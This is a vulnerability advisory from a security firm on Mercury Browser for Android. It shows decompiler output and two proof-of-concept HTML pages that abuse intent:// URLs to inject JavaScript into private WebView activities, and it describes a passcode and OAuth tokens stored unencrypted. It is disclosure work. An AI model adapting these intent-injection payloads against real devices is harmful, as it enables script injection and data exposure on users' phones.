Multiple Vulnerabilities in Mercury Browser for Android | VerSprite Multiple Vulnerabilities in Mercury Browser for Android | VerSprite

Multiple Vulnerabilities in Mercury Browser for Android Version 2.2.2 & 3.0.0

Written By: Versprite

Insecure Intent URL Implementation

An insecure implementation of the intent URL scheme revolves around theIntent.parseUri() method, which allows you to create an intent from an URI. The first thing we did when reversing the Mercury Browser was search for that specific method within the target packages.

In [12]: show_Paths(d, x.tainted_packages.search_methods(".", "parseUri", "."))
 
1 Lcom/ilegendsoft/mercury/ui/widget/webview/e;->shouldOverrideUrlLoading(Landroid/webkit/WebView; Ljava/lang/String;)Z (0x18a) ---> Landroid/content/Intent;->parseUri(Ljava/lang/String; I)Landroid/content/Intent;
 
1 Lcom/ilegendsoft/mercury/ui/widget/webview/e;->shouldOverrideUrlLoading(Landroid/webkit/WebView; Ljava/lang/String;)Z (0x1be) ---> Landroid/content/Intent;->parseUri(Ljava/lang/String; I)Landroid/content/Intent;
 
1 Lcom/ilegendsoft/mercury/ui/widget/webview/e;->shouldOverrideUrlLoading(Landroid/webkit/WebView; Ljava/lang/String;)Z (0x246) ---> Landroid/content/Intent;->parseUri(Ljava/lang/String; I)Landroid/content/Intent;

We can see the parseUri() method being called from the com.ilegendsoft.mercury.ui.widget.e class. Now we want to see if the URL being loaded within the Main Activity of the browser somehow winds up as the second argument to the shouldOverrideUrlLoading() method. If we generate XREFS for the class we can see a call being made from com.legend.mercury.ui.activities.MainActivity, and to save you the headache of the going through the entire CFG, we did validate that this was indeed the case.

In [11]: d.CLASS_Lcom_ilegendsoft_mercury_ui_widget_webview_e.show_xref()
 
########## XREF
 
F: Lcom/ilegendsoft/mercury/ui/activities/MainActivity; a (Lcom/ilegendsoft/mercury/ui/widget/webview/CustomWebView;)V a
 
####################

The browser checks whether or not the URL starts with the “intent://“ scheme, and jumps if true to passing the URL into the parseUri() call. This object is used to call the startActivity() operation on the MainActivity.

mercury_ida_01
mercury_ida_02

Now that we know the browser supports an insecure implementation of the intent URL scheme, we can investigate Activities that would “benefit” from an intent object that we now control. VerSprite found two target Activities that could be used in either disclosing local files or creating an UXSS:
– com.ilegendsoft.social.common.SimpleWebViewActivity
– com.ilegendsoft.clouddrive.box.BoxAuthActivity

The BoxAuthActivity is used for Box authorization within the Mercury Browser, and retrieves an intent object within its onCreate() method. It takes the extra string “url_authorize” and passes that as an argument to the method which gracefully loads this string into a WebView via loadUrl().

mercury_ida_03

Exploitation of this requires us to load an HTML page which we can control into the Mercury browser. The JavaScript within the page will create a new intent URL scheme, which will send an intent object to the target component with some potentially malicious JavaScript.

 <html> <body> <script> location.href="intent:#Intent;S.url_authorize=javascript:alert(1);SEL;component=com.ilegendsoft.mercury/com.ilegendsoft.clouddrive.box.BoxAuthActivity;end"; </script> </body> </html> 

The SimpleWebViewActivity has pretty much the same issue. It first calls getIntent() to retrieve the intent object. Then uses the method getStringExtra()to assign and call loadUrl() on a WebView from a string with the key “load”. We can exploit this in the exact same way as before.

mercury_ida_04

 <html> <body> <script> location.href="intent:#Intent;S.load=javascript:alert(1);SEL;component=com.ilegendsoft.mercury/com.ilegendsoft.social.common.SimpleWebViewActivity;end"; </script> </body> </html> 

It is important to realize that both of these vulnerable Activities are not exported and are considered to be private components of the browser application, which makes this type of issue to have a bit more impact.

Passcode and OAuth Exposure

The Mercury Browser allows you to configure a passcode for the application, which you will have to submit each time you open it as a protection mechanism. The problem is the passcode is stored in the browser’s shared preferences unencrypted.

ZCloudConfig.xml
 
application.xml
 
com.ilegendsoft.mercury_preferences.xml
 
lbsdata.xml
 
mapplication.xml
 
menu_add_function.xml
 
menus.xml
 
mercury_flurry_log_event.xml
 
merucry_application_theme.xml
 
navigation_v_2.xml
 
passcode.xml
 
readinglist_shredpreference.xml
 
search_engine_v_2.xml
 
speed_dial_v_2.xml
 
speeddial.xml
 
zcloud_db.xml
 
ode.xml                                                                       <
 
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
 
<map>
 
    <string name="passcode">1111</string>
 
</map>

The OAuth tokens used for your Box account will also be stored unencrypted within SharePreferences inside box_auth_info.xml.

Conclusion

The previous version of Mercury Browser for Android (2.2.2) has been verified to have all the above vulnerabilities. Mercury Browser for Android (3.0.0) has only been verified of the insecure intent URL implementation vulnerability and it is assumed that the passcode log is still being stored unencrypted for now. VerSprite has validated that the version of the Mercury Browser for Android (2.2.3) is not vulnerable to the insecure intent URL implementation vulnerability, however has not tested and validated the unencrypted storage of the sensitive information above. It is recommended that all users running this browser on their Android devices not update to the latest version (3.0.0) on the Google Play Store.

Protect Your Assets from Various Threat Actors

VerSprite's Research and Development division (a.k.a VS-Labs) is comprised of individuals who are passionate about diving into the internals of various technologies.

Our clients rely on VerSprite's unique offerings of zero-day vulnerability research and exploit development to protect their assets from various threat actors.

From advanced technical security training to our research for hire B.O.S.S offering, we help organizations solve their most complex technical challenges. Learn more about Research as a Service →

Receive Security News





View our security advisories detailing vulnerabilities found in major products for MacOs, Windows, Android, and iOS.

We are an international squad of professionals working as one.

logos